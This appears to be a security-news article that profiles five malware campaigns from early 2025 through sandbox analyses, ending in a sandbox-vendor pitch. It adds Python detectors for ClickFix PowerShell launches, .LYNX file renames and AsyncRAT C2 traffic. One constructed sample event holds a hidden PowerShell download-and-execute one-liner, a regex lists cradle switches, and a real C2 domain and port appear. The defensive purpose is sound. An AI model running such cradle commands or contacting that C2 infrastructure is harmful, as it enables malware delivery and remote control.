The first quarter of 2025 has been a battlefield in the world of cybersecurity. Cybercriminals continued launching aggressive new campaigns and refining their attack methods.
Below is an overview of five notable malware families, accompanied by analyses conducted in controlled environments.
NetSupport RAT Exploiting the ClickFix Technique
In early 2025, threat actors began exploiting a technique known as ClickFix to distribute the NetSupport Remote Access Trojan (RAT).
This method involves injecting fake CAPTCHA pages into compromised websites, prompting users to execute malicious PowerShell commands that download and run the NetSupport RAT.
Once installed, this RAT grants attackers full control over the victim’s system, allowing activities such as real-time screen monitoring, file manipulation, and execution of arbitrary commands.
Main technical characteristics of NetSupport RAT
- Attackers can view and control the victim’s screen in real time.
- Uploads, downloads, modifies, and deletes files on the infected system.
- Runs system commands and PowerShell scripts remotely.
- Captures copied text, including passwords and sensitive data.
- Records user keystrokes for credential theft.
- Starts, stops, and modifies system processes and services.
- Installs itself in startup folders, registry keys, or scheduled tasks to survive reboots.
- Uses process injection and code obfuscation to evade detection.
- Maintains a stealthy connection with attackers using encrypted traffic.
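ClickFix relies on the victim launching a PowerShell download cradle from an interactive shell, so the process tree (a script host spawned by explorer.exe with download-and-execute switches) is the most reliable place to catch it. The detector below is an added example, not code from the article or from ANY.RUN; the event fields and the three sample events are constructed to resemble Sysmon process-creation records.

```python
import re

# Constructed process-creation events (Sysmon event 1 style); not taken from the article.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -nop -c "iwr http://example.invalid/a.txt | iex"'},
    {"parent": r"C:\Program Files\Vendor\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\ProgramData\agent\inventory.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c dir"},
]

# A user pasting into the Run box or a shell gives explorer.exe as the parent.
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}
# Download-cradle and hidden-window switches typical of ClickFix one-liners.
CRADLE_RE = re.compile(
    r"(?i)(?<![\w-])(?:iwr|invoke-webrequest|downloadstring|iex|invoke-expression"
    r"|-e(?:nc|ncodedcommand)?\b|-w(?:indowstyle)?\s+hidden)"
)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return (severity, matched tokens) for a suspicious event, or None."""
    parent, image = basename(event["parent"]), basename(event["image"])
    if image not in SCRIPT_HOSTS:
        return None
    hits = sorted({re.sub(r"\s+", " ", m.group(0).lower())
                   for m in CRADLE_RE.finditer(event["cmdline"])})
    if parent in INTERACTIVE_PARENTS and hits:
        return ("high", hits)      # interactive launch plus cradle: ClickFix pattern
    if hits:
        return ("medium", hits)    # cradle from a non-interactive parent
    return None


def scan(events):
    """Index every event that classify() flags, with its severity and tokens."""
    return [(i, *res) for i, ev in enumerate(events) if (res := classify(ev))]
```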
After running the NetSupport RAT payload inside ANY.RUN’s Interactive Sandbox, we can see several activities.
View NetSupport RAT analysis session
[Image: Malicious archive opened inside ANY.RUN sandbox]
When NetSupport RAT infects a system, it immediately establishes a connection with a command-and-control (C2) server, allowing attackers to operate the compromised machine remotely.
[Image: C2 connection detected by ANY.RUN sandbox]
Through this connection, attackers can execute system commands, deploy additional malware, and modify system settings.
NetSupport RAT employs multiple Tactics, Techniques, and Procedures (TTPs) to maintain persistence, evade detection, and gather system data. Key TTPs include:
- Persistence & Execution: Modifies registry startup keys, executes scripts via wscript.exe.
- Discovery: Reads computer name, checks system language, and accesses environment variables.
- Defense Evasion & C2 Communication: Drops legitimate Windows executables, creates internet connection objects for remote control.
These techniques demonstrate how NetSupport RAT establishes control while avoiding detection, all of which are visible in ANY.RUN’s ATT&CK mapping.
[Image: Main TTPs used by NetSupport RAT]
Lynx Ransomware
The Lynx Ransomware-as-a-Service (RaaS) group is known as a highly organized entity, offering a structured affiliate program and robust encryption methods. Building upon the foundation of the earlier INC ransomware, Lynx has enhanced its capabilities and expanded its reach, targeting a diverse range of industries across multiple countries.
Lynx’s affiliate panel lets affiliates configure victim profiles, generate custom ransomware samples, and manage data-leak schedules from a user-friendly interface. This structured approach makes Lynx one of the most accessible ransomware operations, even for affiliates with limited technical expertise.
To incentivize participation, Lynx offers affiliates an 80% share of ransom proceeds. The group maintains a leak site where stolen data is published if victims fail to pay the ransom.
Major attacks of Lynx in Q1
In the first quarter of 2025, the Lynx Ransomware-as-a-Service (RaaS) group intensified its operations, targeting various industries with sophisticated attacks.
In February 2025, Lynx claimed responsibility for breaching Brown and Hurley, a prominent Australian truck dealership. The group alleged the theft of approximately 170 gigabytes of sensitive data, including human resources documents, business contracts, customer information, and financial records.
In January 2025, Lynx also breached Hunter Taubman Fischer & Li LLC, a U.S.-based law firm specializing in corporate and securities law.
Main technical characteristics of Lynx ransomware
- Encrypts all files by default, including local drives, network shares, and removable media.
- Configurable via RaaS to target specific file types, folders, or extensions.
- Steals sensitive data before encryption, exfiltrating documents, credentials, and financial information.
- Transfers stolen data over encrypted channels, such as HTTPS or custom communication protocols.
- Deletes Volume Shadow Copies and disables Windows recovery features to prevent restoration.
- Closes applications that may block encryption using RestartManager.
- Utilizes credential dumping techniques to extract stored passwords from browsers, Windows Credential Manager, and networked devices.
- Maintains a C2 connection with DGA-based domains and anonymized traffic via Tor.
- Detects VMs and sandboxes, altering behavior to evade analysis.
- Runs in memory without writing files to disk, avoiding detection.
We can observe Lynx Ransomware’s behavior firsthand in a controlled environment. In the ANY.RUN sandbox analysis, after executing the Lynx payload, the infected system undergoes several noticeable changes.
View Lynx ransomware analysis session
[Image: Desktop background changed inside ANY.RUN sandbox]
The desktop background is replaced with a ransom message, and the attackers leave a note warning that all data has been stolen and encrypted. Victims are instructed to download Tor to contact them.
[Image: Ransomware message left by attackers]
The sandbox also detects how Lynx systematically renames files, appending its extension. For example, C:\Users\admin\Desktop\academicroad.rtf becomes C:\Users\admin\Desktop\academicroad.rtf.LYNX.
[Image: File renames to .LYNX detected by ANY.RUN]
Dozens of files across the system are modified this way, further confirming its encryption process. These are just a few of the many destructive actions Lynx carries out once inside a compromised system.
[Image: Modification of files by Lynx ransomware]
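The rename pattern shown above (original name kept, .LYNX appended) is a cheap, high-signal detection: a single process renaming many files this way within seconds, including files on network shares, is the encryption loop in progress. The script below is an added example, not code from the article or from ANY.RUN; the file-event tuples are constructed, with only the academicroad.rtf path taken from the analysis session described above.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LYNX_EXT_RE = re.compile(r"\.lynx$", re.IGNORECASE)

# Constructed file-system events: (timestamp, pid, operation, old path, new path).
SAMPLE_EVENTS = [
    ("2025-03-01T10:00:00", 4120, "rename", r"C:\Users\admin\Desktop\academicroad.rtf",
     r"C:\Users\admin\Desktop\academicroad.rtf.LYNX"),
    ("2025-03-01T10:00:01", 4120, "rename", r"C:\Users\admin\Documents\budget.xlsx",
     r"C:\Users\admin\Documents\budget.xlsx.LYNX"),
    ("2025-03-01T10:00:01", 4120, "rename", r"\\fileserver\share\contract.docx",
     r"\\fileserver\share\contract.docx.LYNX"),
    ("2025-03-01T10:00:02", 4120, "rename", r"C:\Users\admin\Pictures\photo.jpg",
     r"C:\Users\admin\Pictures\photo.jpg.LYNX"),
    ("2025-03-01T10:05:00", 2200, "rename", r"C:\Users\admin\Desktop\draft.txt",
     r"C:\Users\admin\Desktop\draft_v2.txt"),   # benign rename, must not alert
]


def is_lynx_rename(old, new):
    """True when new is exactly old with the .LYNX suffix appended."""
    return LYNX_EXT_RE.search(new) is not None and new[:-5].lower() == old.lower()


def detect_bursts(events, threshold=3, window_s=10):
    """Map pid -> total .LYNX renames for processes that did >= threshold within window_s seconds."""
    per_pid = defaultdict(list)
    for ts, pid, op, old, new in events:
        if op == "rename" and is_lynx_rename(old, new):
            per_pid[pid].append(datetime.fromisoformat(ts))
    alerts = {}
    for pid, stamps in per_pid.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):          # sliding window over sorted timestamps
            while stamps[end] - stamps[start] > timedelta(seconds=window_s):
                start += 1
            if end - start + 1 >= threshold:
                alerts[pid] = len(stamps)
                break
    return alerts


def unc_hosts(events):
    """Network-share hosts that received .LYNX renames, for scoping the blast radius."""
    return sorted({new.split("\\")[2] for _, _, op, old, new in events
                   if op == "rename" and is_lynx_rename(old, new) and new.startswith("\\\\")})
```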
AsyncRAT: Leveraging Python Payloads and TryCloudflare Tunnels
In early 2025, cybersecurity researchers uncovered a sophisticated malware campaign deploying AsyncRAT, a remote access trojan known for its efficient, asynchronous communication capabilities.
This campaign stands out due to its use of Python-based payloads and the exploitation of TryCloudflare tunnels to enhance stealth and persistence.
Infection Chain Overview
The attack initiates with a phishing email containing a Dropbox URL. When recipients click the link, they download a ZIP archive housing an internet shortcut (URL) file.
This file, in turn, retrieves a Windows shortcut (LNK) file via a TryCloudflare URL. Executing the LNK file triggers a chain of PowerShell, JavaScript, and batch scripts that download and execute a Python payload.
This payload is responsible for deploying multiple malware families, including AsyncRAT, Venom RAT, and XWorm.
Technical Characteristics of AsyncRAT
- Allows attackers to execute commands, monitor user activity, and manage files on the compromised system.
- Capable of stealing sensitive information, including credentials and personal data.
- Employs techniques to maintain long-term access, such as modifying system registries and utilizing startup folders.
- Uses obfuscation and encryption to evade detection by security solutions.
Inside ANY.RUN’s analysis session, we can open the MalConf section to reveal the malicious configurations used by AsyncRAT.
View AsyncRAT analysis session
[Image: Malicious configurations analyzed inside controlled environment]
As we can see, AsyncRAT connects to masterpoldo02[.]kozow[.]com over port 7575, allowing remote attackers to control infected machines. Blocking this domain and monitoring traffic to this port can help prevent infections.
AsyncRAT also installs itself in %AppData% to blend in with legitimate applications and uses a mutex (AsyncMutex_alosh) to prevent multiple instances from running.
The malware also uses AES encryption with a hardcoded key and salt, making it difficult for security tools to analyze its communications.
[Image: AES encryption used by AsyncRAT]
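The configuration extracted above gives two indicators worth operationalising: the C2 host and port, and the mutex name. The matcher below is an added example, not code from the article or from ANY.RUN; it refangs the domain as printed in the report and runs it over constructed connection-log lines, treating an unexplained outbound connection on port 7575 as a weaker secondary signal.

```python
import re

# Indicators as given in the AsyncRAT analysis above (domain printed defanged).
DEFANGED_C2 = "masterpoldo02[.]kozow[.]com"
C2_PORT = 7575
MUTEX = "AsyncMutex_alosh"


def refang(indicator):
    """Turn a defanged indicator back into a matchable string."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


C2_HOST = refang(DEFANGED_C2)

# Constructed connection log (ts src dst dport proto host=<SNI or DNS name>); not real traffic.
SAMPLE_CONN_LOG = """\
1711111111.1 10.0.0.5 203.0.113.10 443 tcp host=update.microsoft.com
1711111112.2 10.0.0.5 203.0.113.77 7575 tcp host=masterpoldo02.kozow.com
1711111113.3 10.0.0.8 203.0.113.77 7575 tcp host=
1711111114.4 10.0.0.5 203.0.113.10 80 tcp host=example.org
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+) (?P<dport>\d+) (?P<proto>\S+) host=(?P<host>\S*)$"
)


def match_c2(log_text):
    """Return (source host, severity, reason) for every line that matches an indicator."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        host, dport = m["host"].lower(), int(m["dport"])
        if host == C2_HOST or host.endswith("." + C2_HOST):
            findings.append((m["src"], "high", "known AsyncRAT C2 domain"))
        elif dport == C2_PORT:
            findings.append((m["src"], "medium", f"outbound port {C2_PORT} to unknown host"))
    return findings


def mutex_is_asyncrat(name):
    """Exact match on the sample's mutex, plus the AsyncMutex_ prefix AsyncRAT builds use."""
    return name == MUTEX or name.lower().startswith("asyncmutex_")
```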
Lumma Stealer: GitHub-Based Distribution
In early 2025, cybersecurity experts uncovered a sophisticated campaign involving Lumma Stealer, an information-stealing malware.
Attackers used GitHub’s release infrastructure to distribute this malware, exploiting the platform’s trustworthiness to bypass security measures.
Once executed, Lumma Stealer initiates additional malicious activities, including downloading and running other threats like SectopRAT, Vidar, Cobeacon, and additional Lumma Stealer variants.
Technical Characteristics of Lumma Stealer
- Distributed through GitHub releases, leveraging trusted infrastructure to evade security detection.
- Steals browser credentials, cookies, cryptocurrency wallets, and system information.
- Sends stolen data to remote servers, enabling real-time exfiltration.
- Can download and execute additional malware, including SectopRAT, Vidar, and Cobeacon.
- Uses registry modifications and startup entries to maintain access.
- Detectable through network-based security monitoring tools, revealing malicious communication patterns.
[Image: Lumma Stealer analyzed inside ANY.RUN virtual machine]
A detailed examination using the ANY.RUN sandbox demonstrates Lumma Stealer’s behavior.
Upon execution, the malware connects to its command-and-control server, facilitating the exfiltration of sensitive data. The analysis also reveals the triggering of specific Suricata rules:
[Image: Suricata rule triggered by Lumma Stealer]
The analysis session also reveals how Lumma steals credentials from web browsers and exfiltrates personal data:
[Image: Credentials and personal data theft by Lumma Stealer]
InvisibleFerret: The Silent Threat Lurking in Fake Job Offers
In a wave of social engineering attacks, cybercriminals have been leveraging InvisibleFerret, a stealthy Python-based malware, to compromise unsuspecting victims.
Disguised as legitimate software, it is delivered in fake job interview campaigns in which attackers pose as recruiters and trick professionals into downloading malicious tools.
Technical Characteristics of InvisibleFerret
- The malware employs disorganized and obfuscated Python scripts, making analysis and detection challenging.
- InvisibleFerret actively searches for and exfiltrates sensitive information, including source code, cryptocurrency wallets, and personal files.
- Often delivered as a secondary payload by another malware called BeaverTail, which is an obfuscated JavaScript-based infostealer and loader.
- The malware establishes persistence on the infected system, ensuring continued access and control.
A key element of the InvisibleFerret attack is the deployment of BeaverTail, a malicious NPM module that delivers a portable Python environment (p.zip) to execute the malware.
Acting as the first stage in a multi-layered attack chain, BeaverTail sets up InvisibleFerret, a stealthy backdoor with advanced obfuscation and persistence mechanisms, making detection difficult.
By submitting InvisibleFerret to ANY.RUN’s Interactive Sandbox, we can analyze its behavior in real time:
View InvisibleFerret analysis session
[Image: InvisibleFerret behavior analyzed by ANY.RUN sandbox]
The malware starts by collecting system information, such as OS version, hostname, username, and geolocation, using services like ip-api.com, a method also used by cryptocurrency drainers.
[Image: Exfiltrated information analyzed inside ANY.RUN sandbox]
Malicious requests blend with normal traffic, making detection challenging. ANY.RUN’s interface highlights these activities, showing network requests in orange and red beneath the virtual machine.
[Image: Malicious requests blended with legitimate traffic, all issued by the same script]
Clicking on the ATT&CK button in ANY.RUN’s sandbox provides a breakdown of InvisibleFerret’s TTPs. One key detection is T1016 (“System Network Configuration Discovery”), which highlights how the malware gathers geolocation and system data.
[Image: Main TTPs used by InvisibleFerret]
Don’t Let Threats Go Unnoticed – Detect Them with ANY.RUN
The first quarter of 2025 has been filled with stealthy and aggressive cyber threats, from ransomware operations to silent data stealers. But attackers don’t have to win.
ANY.RUN’s Interactive Sandbox gives businesses the power to analyze malware in real time, uncover hidden behaviors, and strengthen defenses before an attack escalates.
With ANY.RUN, security teams can:
- Gather IOCs instantly to speed up threat hunting and incident response.
- Get structured, in-depth reports for better visibility into malware behavior.
- Map threats to the ATT&CK framework to understand tactics and techniques used by attackers.
- Collaborate seamlessly, sharing real-time analysis across teams.
Sign up for a free ANY.RUN trial today and experience it for yourself!
https://thehackernews.com/2025/02/5-active-malware-campaigns-in-q1-2025.html